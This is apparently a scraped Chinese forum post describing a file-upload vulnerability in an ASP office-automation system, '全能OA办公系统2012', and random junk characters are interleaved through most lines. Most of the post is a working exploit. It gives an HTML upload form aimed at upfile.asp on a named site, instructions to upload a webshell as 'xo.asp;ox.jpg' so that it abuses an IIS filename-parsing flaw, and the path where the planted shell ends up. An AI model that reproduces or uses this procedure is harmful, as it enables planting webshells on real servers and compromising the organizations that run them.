全能OA办公系统 上传漏洞
: j# h! y7 r4 y( [4 T
6 t, c1 P9 M+ P0 y+ J系统介绍:0 s* I, V/ {$ f' ~& A9 v6 I2 ~
+ o1 H5 v# `$ O' m U8 P2 Z' @% u* J
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。- \8 D5 n- ?5 l6 ^/ Y3 l6 I+ V
% A$ i" [7 D5 @# E' Q# J' \
主要功能:
3 c7 c c: W& b/ S公司通告 , Q, s0 ]. Z& _
工作计划
2 V2 J! s& ^4 O$ U! r通讯助理
1 {! y* Z6 U8 q客户资源 / Z( `2 `# y" s* |3 B6 X' G* _
我的公文
2 i2 p; O9 B& Z r# u公文传阅 $ k# B3 ~+ I9 o' r
公共资源
1 L7 D9 B4 f0 _) F资源预约 4 f. k8 D9 |8 u
今日考勤
* @: X( I7 d5 `/ w e个人计划 : B9 Y6 _' q6 a- K
个人通讯录
5 c) U7 ]. @$ F' P- G$ C" O个人基本档案
& r9 b( B d* {# g未读邮件
' n% t6 L P) f$ S7 Y" m发邮件 * R9 |- \9 ~% [( F$ g
收件夹 & q) n C! H5 F$ v' x, q
寄件夹
P2 X* s# Y) q1 v0 h1 j8 L- N网络硬盘 , |+ p1 h; h: X% P+ ]
网络会议
5 T1 E" w* j% j+ k0 ^4 b2 D网络调查
- B- K/ i( H% C$ P P p6 K) J交流论坛
* b$ u2 f. V. K1 s; H6 Y% J3 K( q3 Y: d- D. C; `* B9 d
有兴趣测试的朋友可以下源码看看
4 {' m) l% z, v% V, f5 L2 K& e3 o- M6 J# f) M$ N/ o3 F# g" k) u1 R8 r
源码下载:& W) v1 Y0 l& E) H% Y
: C$ O3 D* k" R( w: q
http://www.mycodes.net/30/4750.htm
- Q6 x9 f# H; L+ Q
* T3 K+ s' V% K" `& J5 j' x, {0 Z漏洞介绍:
7 H9 [ e( y( A2 |
# D0 z8 f& I$ K由upfile.asp上传文件漏洞引起. q( l9 C- {- s! y) J' q
5 A( O3 ~0 `. V
测试方法:1 x: }+ M! ^% ?9 N
) c0 _8 L9 `/ J" g0 r" j. X使用名小子上传http://www.itlynn.com/upfile.asp即可
* S/ L* t3 ?' X$ F! J5 P3 ~! ^
如果upfile.asp文件被删除不存在。0 [* I9 Z" d$ K8 L- t3 v% w& s! u7 [
, p& `0 ?5 w0 v5 N$ x7 m' P 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。: i0 D) |1 r; J, ^* P1 Y3 O/ k
( a0 s; R, E5 V" Y
如果存在那么将如下代码保存为upfile.html。' d r- b( G$ z) v" s# W
+ F/ j6 |- p9 g* c0 x+ o$ {然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
- t# e( a2 p" [. ?% m
+ d j& c0 d, q. T' W
5 k0 |, Y, {: f& ]- f) T+ j& g
, [5 C( k( Z) p# \4 q& z% a01 <table border='0' align="center" cellpadding="5">
# u$ x2 i X; O+ s( b* k: H" k, F( e& U
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
' X0 U, _$ M' ]( X: z8 L- C" N4 Q0 F, g
03 <tr> 3 W! Y! q& z* H1 A5 ~# j! x' _* D+ v
: A. y6 C# K% i4 P0 ]04 <td>报错:</td>
& [, k8 d# j) s! B- `) U1 L6 }/ a& ~6 K2 m6 M4 U
05 <td><input type='radio' name='errnumber' value='0'> 4 a/ m) E2 ^6 _8 _: |6 {& v$ b4 x# q
8 k) F2 D- C9 s9 i1 j* e+ |) ^06 自动更名 4 G5 `1 r- ?3 e6 U
& M. l) ^4 p+ f0 `. r07 <input type='radio' name='errnumber' value='1' checked>
4 c( d0 Z- R" z, e0 }; \( W9 {! ~: @5 { a1 p0 e
08 报错方式 0 l1 d, J& K% Q1 g- i% u' p
! z) s I ]2 r2 P
09 <input type='radio' name='errnumber' value='2'>
: | R3 s# |! U9 `. l8 S! a
! @0 I: x+ k8 R) L, x1 E" Q10 直接覆盖</td> ; o% B1 `/ e# g5 P
5 z3 P5 b: q$ v! n- d/ U& q9 E5 _11 </tr>
% _7 B% K+ m7 Q3 K/ S# x
: U+ H0 @8 [" K! ]3 @12 <tr> 7 w) a/ t g8 P% z
. p2 O' A5 n F6 w4 U. A13 <td>主题:</td>
; l# t# [! D1 a8 h+ v3 N' x- L& x0 ^0 v
14 <td><input type='text' name='filename' size='30'></td> 4 z9 @6 {1 i$ h' R. v* Y
/ U7 W2 G' b$ K8 l' \) q+ J7 c& f4 P15 </tr> / R8 G5 t1 G# t6 S8 X v ?
% e. [* f+ l- v' U" k2 Q16 <tr>
; J/ @. e/ q6 d% d0 R; ?) Z8 J. G
/ Y; Y$ P' z' G" z17 <td>文件:</td> 8 G& e6 i: ]& ]9 u. \5 z4 [
6 u; T' e2 }8 q' E2 ]
18 <td><input type="file"name="fruit"size="30"></td> ( r, F+ e! Z& w
( K, z f) J1 j19 </tr>
" `4 t- F3 x. t" E) `4 O6 p% @/ C% E8 {( e3 o" A; W
20 <tr> : a- Q6 e. e2 O# e2 f0 J
! a9 ~! I, n; b$ L21 <td valign='top'>简介:</td> L6 D, _4 K7 U5 T
b& F8 d J8 w4 _7 T, X
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ; u) ]# I! x) G7 a
s* p1 m {. K, Y9 q3 j# O/ Z
23 </tr> 6 s5 V" o* b6 u# Z
! R& [% ^9 Q/ t0 t8 [( G
24
. L* `, I7 @1 I- E4 x$ Z' F8 f* S3 p& Y6 p1 k2 ?
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ! b% n( D6 o' Y7 h% @" `6 ^: ?% P o# G
) a3 s' o! V# G4 V! p4 ?' u0 F
26 </tr>
) s e" c$ i. H5 ?* x; O2 @
# i# w; D; v/ l27 </form>
. d/ w3 e- D9 c! x! E" q* d# G, K+ Y. |
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
" _ b" p( K) R9 G0 K
2 d% u* \% k2 `0 }: z 4 t/ L, \+ X( r( b5 k* q5 L5 O' q
, {8 m5 o) \( W+ h( p' @上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
7 D: q; T& h4 v M3 p3 `1 O% J- j8 r& l6 A1 z2 O% l( ]2 `
此漏洞需要配合解析漏洞利用。
! G/ \3 n7 R! m8 r1 M5 ]" W' j: W! y" h5 O& \1 k
|